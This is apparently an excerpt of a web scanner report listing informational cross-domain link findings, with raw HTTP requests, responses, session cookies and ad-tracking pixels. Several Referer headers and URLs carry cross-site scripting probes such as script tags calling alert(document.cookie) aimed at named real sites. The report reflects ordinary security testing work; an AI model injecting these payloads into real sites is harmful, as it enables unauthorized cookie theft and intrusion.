<img src="http://at.amgdgt.com/ads/?t=pp&px=10660&rnd=1596989115" width="1" height="1" border="0"/>
<!-- Tribal -->
<img src='http://a.tribalfusion.com/i.cid?c=345683&d=30&page=landingPage' width='1' height='1' border='0'>
<!--ValueClick-->
<img src="http://media.fastclick.net/w/tre?ad_id=23145;evt=15951;cat1=19199;cat2=19200" width="1" height="1" border="0">
<!-- mmath -->
<img src="http://action.mathtag.com/mm//RSHA//red?nm=NoSRemar&s0=&s1=&s2=&v0=&v1=&v2=&ri=%n" width="1" height="1" />
<img src="http://ad.yieldmanager.com/pixel?id=906283&id=906282&id=103817&t=2" width="1" height="1" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032222048/?label=cWnnCOzM4AEQ4OqZ7AM&amp;guid=ON&amp;script=0"/>
<img src="http://pixel.mathtag.com/event/img?mt_id=1524&mt_adid=221" height="1" width="1" />
<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=38638;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
<!--Begin DLX Pixel-->
...[SNIP]...
<!-- Media 6 -->
<img width="1" height="1" src="http://action.media6degrees.com/orbserv/hbpix?pixId=4548&pcv=47" />
<!--ZAP IMP-->
...[SNIP]...
<!-- Segment Pixel ... RadioShack_General_Segment_RTG - DO NOT MODIFY -->
<img src="http://ib.adnxs.com/seg?add=65890&t=2" width="1" height="1" />
<!-- End of Segment Pixel -->
...[SNIP]...
<!-- 247 -->
<IMG SRC="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Radioshack/Retargeting_Conversionpage_Nonsecure@Bottom3">
<!-- Advertiser 'Radio Shack', Include user in segment 'Radio Shack General RTG' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=1082184&t=2" width="1" height="1" />
<!-- End of segment tag -->
...[SNIP]...
<!-- Begin 33Across Tag -->
<img src="http://pixel.33across.com/ps/?pid=141&amp;cgn=13888&amp;seg=6770"style="visibility:hidden;width:1px;height:1px;">
<!-- End 33Across Tag -->

20.34. http://docs.google.com/viewer

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.google.com
Path:   /viewer

Issue detail

The page was loaded from a URL containing a query string:
  • http://docs.google.com/viewer?a=v&q=cache:&hl=en&gl=us&pid=bl&srcid=ADGEESi?hl=en&tab=wo
The response contains the following links to other domains:
  • http://ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif
  • http://www.youtube.com/?tab=o1

Request

GET /viewer?a=v&q=cache:&hl=en&gl=us&pid=bl&srcid=ADGEESi?hl=en&tab=wo HTTP/1.1
Host: docs.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 15:05:17 GMT
Expires: Mon, 24 Jan 2011 15:05:17 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=5">
<script type="text/javascript">
(fun
...[SNIP]...
</a> <a target=_blank href="http://www.youtube.com/?tab=o1" class=gb2>YouTube</a>
...[SNIP]...
<a title="Back to Google Docs" href="//docs.google.com/"><img border="0" id="docs-logo" src="//ssl.gstatic.com/docs/common/logo/docs_logo_sm.gif" width="122" alt="Google Docs logo"></a>
...[SNIP]...

20.35. http://docs.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://docs.joomla.org
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://docs.joomla.org/index.php?title=Special:UserLogin&type=signup&returnto=Main_Page
The response contains the following links to other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.mediawiki.org/

Request

GET /index.php?title=Special:UserLogin&type=signup&returnto=Main_Page HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Set-Cookie: docsj_mediawiki_session=40d5d912ccf86251c09e6204ee9fda3b; path=/; HttpOnly
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
       <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="/skins/common/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" />
...[SNIP]...

20.36. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
  • http://fls.doubleclick.net/activityi;src=2819819;type=retar278;cat=autob211;ord=8268780936487.02?
The response contains the following link to another domain:
  • http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?

Request

GET /activityi;src=2819819;type=retar278;cat=autob211;ord=8268780936487.02? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 24 Jan 2011 21:06:42 GMT
Expires: Mon, 24 Jan 2011 21:06:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 303

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><script type="text/javascript" src="http://cti.w55c.net/ct/ct-b0e2fed435e243e8a8a841e55341dc2d.js?"></script>
...[SNIP]...

20.37. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
  • http://fls.doubleclick.net/activityi;src=1829700;type=homep704;cat=autot851;ord=9811137525830.418?
The response contains the following link to another domain:
  • http://adserver.adtechus.com/bind?ckey1=autotrdr_exclude;cvalue1=autotrdr_exclude;expiresDays=30;adct=text/html;misc=123

Request

GET /activityi;src=1829700;type=homep704;cat=autot851;ord=9811137525830.418? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 25 Jan 2011 02:19:48 GMT
Expires: Tue, 25 Jan 2011 02:19:48 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 346

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://adserver.adtechus.com/bind?ckey1=autotrdr_exclude;cvalue1=autotrdr_exclude;expiresDays=30;adct=text/html;misc=123" width="1" height"1"></body>
...[SNIP]...

20.38. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:
  • http://fls.doubleclick.net/activityi;src=1890937;type=leadq962;cat=autoc435;ord=2796071618795.395?
The response contains the following link to another domain:
  • http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=EF49DD91943288556B07EA9CA12529D8&rsi_site=3BA6B57E2462874C6ECE9A88A9EFB9F7&rsi_event=4124D1F49399B97ABFE4F69108069695

Request

GET /activityi;src=1890937;type=leadq962;cat=autoc435;ord=2796071618795.395? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.autocheck.com/?WT.mc_id=1824&siteID=182471a71%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6dab831a574
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 25 Jan 2011 02:18:43 GMT
Expires: Tue, 25 Jan 2011 02:18:43 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 918

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Tag for Activit
...[SNIP]...
<!-- End of DoubleClick Spotlight Tag: Please do not remove--><img src="http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=EF49DD91943288556B07EA9CA12529D8&rsi_site=3BA6B57E2462874C6ECE9A88A9EFB9F7&rsi_event=4124D1F49399B97ABFE4F69108069695"/></body>
...[SNIP]...

20.39. http://forum.joomla.org/ucp.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /ucp.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://forum.joomla.org/ucp.php?mode=register
The response contains the following links to other domains:
  • http://kontentdesign.com/
  • http://opensource.org/licenses/gpl-license.php
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en
  • http://www.opensourcematters.org/
  • http://www.phpbb.com/
  • http://www.rochenhost.com/joomla-hosting

Request

GET /ucp.php?mode=register HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=937f6ec303cabbfe9c8df22a65214623; expires=Tue, 24-Jan-2012 15:11:55 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...
red by phpBB (hereinafter ...they..., ...them..., ...their..., ...phpBB software..., ...www.phpbb.com..., ...phpBB Group..., ...phpBB Teams...) which is a bulletin board solution released under the ...<a href="http://opensource.org/licenses/gpl-license.php">General Public License</a>... (hereinafter ...GPL...) and can be downloaded from <a href="http://www.phpbb.com/">www.phpbb.com</a>
...[SNIP]...
ly facilitates internet based discussions, the phpBB Group are not responsible for what we allow and/or disallow as permissible content and/or conduct. For further information about phpBB, please see: <a href="http://www.phpbb.com/">http://www.phpbb.com/</a>
...[SNIP]...
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_blank" >phpBB</a>
...[SNIP]...
<div id="footerInfo">&copy; 2005-2010 <a target="_blank" href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved.
           <a target="_blank" title="Joomla Hosting" href="http://www.rochenhost.com/joomla-hosting">Joomla hosting</a> by Rochen Ltd.>&nbsp;&nbsp;&nbsp;
           
           <a href="http://kontentdesign.com" target="_blank">Design by Kontent Design</a>
...[SNIP]...

20.40. http://forum.joomla.org/viewforum.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /viewforum.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://forum.joomla.org/viewforum.php?f=511
The response contains the following links to other domains:
  • http://kontentdesign.com/
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en
  • http://www.opensourcematters.org/
  • http://www.phpbb.com/
  • http://www.rochenhost.com/joomla-hosting

Request

GET /viewforum.php?f=511 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=37cbf4e15f54f7989d066007eee62641; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 124356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_blank" >phpBB</a>
...[SNIP]...
<div id="footerInfo">&copy; 2005-2010 <a target="_blank" href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved.
           <a target="_blank" title="Joomla Hosting" href="http://www.rochenhost.com/joomla-hosting">Joomla hosting</a> by Rochen Ltd.>&nbsp;&nbsp;&nbsp;
           
           <a href="http://kontentdesign.com" target="_blank">Design by Kontent Design</a>
...[SNIP]...

20.41. http://forum.joomla.org/viewtopic.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forum.joomla.org
Path:   /viewtopic.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://forum.joomla.org/viewtopic.php?f=8&t=65
The response contains the following links to other domains:
  • http://en.wikipedia.org/wiki/Bump_(Internet)
  • http://en.wikipedia.org/wiki/Flame_war
  • http://en.wikipedia.org/wiki/Internet_troll
  • http://en.wikipedia.org/wiki/Spamming
  • http://kontentdesign.com/
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.catb.org/~esr/faqs/smart-questions.html
  • http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&lang=en
  • http://www.joomlatutorials.com/
  • http://www.opensourcematters.org/
  • http://www.phpbb.com/
  • http://www.rochen.com/
  • http://www.rochenhost.com/joomla-hosting

Request

GET /viewtopic.php?f=8&t=65 HTTP/1.1
Host: forum.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:11:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: phpbb3_cnuw3_u=1; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_k=; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Set-Cookie: phpbb3_cnuw3_sid=ae17e90373187b87758c2dacc0119086; expires=Tue, 24-Jan-2012 15:11:54 GMT; path=/; domain=forum.joomla.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</form>
                                       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_007628682600509520926%3Ahigrppcfurc&amp;lang=en"></script>
...[SNIP]...
<li>Ask Questions The Smart Way. Read <a href="http://www.catb.org/~esr/faqs/smart-questions.html" class="postlink">this</a>
...[SNIP]...
<li>No useless posts. This includes: <a href="http://en.wikipedia.org/wiki/Bump_(Internet)" class="postlink">Thread bumping</a>, useless one liners, <a href="http://en.wikipedia.org/wiki/Flame_war" class="postlink">Flamewars</a>, <a href="http://en.wikipedia.org/wiki/Internet_troll" class="postlink">Trolling</a> and <a href="http://en.wikipedia.org/wiki/Spamming#Newsgroup_spam_and_Forum_spam" class="postlink">Spamming</a>. What is spamming? Read <a href="http://en.wikipedia.org/wiki/Spamming#Newsgroup_spam_and_Forum_spam" class="postlink">this.</a>
...[SNIP]...
<!-- m --><a class="postlink" href="http://www.rochen.com">http://www.rochen.com</a>
...[SNIP]...
<!-- m --><a class="postlink" href="http://www.joomlatutorials.com">http://www.joomlatutorials.com</a>
...[SNIP]...
<span class="copyright">Powered by <a href="http://www.phpbb.com/" target="_blank" >phpBB</a>
...[SNIP]...
<div id="footerInfo">&copy; 2005-2010 <a target="_blank" href="http://www.opensourcematters.org">Open Source Matters, Inc.</a> All rights reserved.
           <a target="_blank" title="Joomla Hosting" href="http://www.rochenhost.com/joomla-hosting">Joomla hosting</a> by Rochen Ltd.>&nbsp;&nbsp;&nbsp;
           
           <a href="http://kontentdesign.com" target="_blank">Design by Kontent Design</a>
...[SNIP]...

20.42. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938548&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295916947994&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295916948025&frm=0&adk=1607234649&ga_vid=208581788.1295916948&ga_sid=1295916948&ga_hid=373713928&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=120&xpc=bWxP3p2ZTF&p=file%3A//
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&usg=AFQjCNGnq40lsgyTq_7lqqTYJvargBixNw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295938548&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fsql-injection-xss-cross-site-scripting-dork.html&dt=1295916947994&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295916948025&frm=0&adk=1607234649&ga_vid=208581788.1295916948&ga_sid=1295916948&ga_hid=373713928&ga_fc=0&u_tz=-360&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&fu=0&ifi=1&dtd=120&xpc=bWxP3p2ZTF&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 00:55:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12210

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/sql-injection-xss-cross-site-scripting-dork.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.checkmarx.com%26adT%3DSQL%2BInjection%2BTutorial%26adU%3Dwww.saintcorporation.com%26adT%3DSaint%2BExploit%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26gl%3DUS&amp;usg=AFQjCNGnq40lsgyTq_7lqqTYJvargBixNw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.43. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.abbreviations.com/bs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E7a00ceef170%2526SE%253D3%2526r%253D1%26hl%3Den%26client%3Dca-pub-6071864913982699%26adU%3Dwww.google.com/webdesigner%26adT%3DAre%2BYou%2BA%2BWeb%2BDesigner%253F%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.elance.com/Javascript%26adT%3DJavascript%2Bprogrammer%26adU%3Dwww.SeeWhy.com/%26adT%3DShopping%2BCart%2BAbandons%26gl%3DUS&usg=AFQjCNEoZD3S-6NohErZ7QpCcI2ZGdeADA

Request

GET /pagead/ads?client=ca-pub-6071864913982699&format=336x280_as&output=html&h=280&w=336&lmt=1295924961&alternate_ad_url=http%3A%2F%2Fwww.stands4.com%2Falternate.html&color_bg=FFFFFF&color_border=FFFFFF&color_link=000055&color_text=000000&color_url=550000&flash=10.1.103&url=http%3A%2F%2Fwww.abbreviations.com%2Fbs.aspx%3Fst%3Db1.aspx51536%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E7a00ceef170%26SE%3D3%26r%3D1&dt=1295903361302&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295903361405&frm=0&adk=1370815790&ga_vid=1564661048.1295903333&ga_sid=1295903333&ga_hid=302104693&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F32&fu=0&ifi=1&dtd=126&xpc=ffdvLBmcAw&p=http%3A//www.abbreviations.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
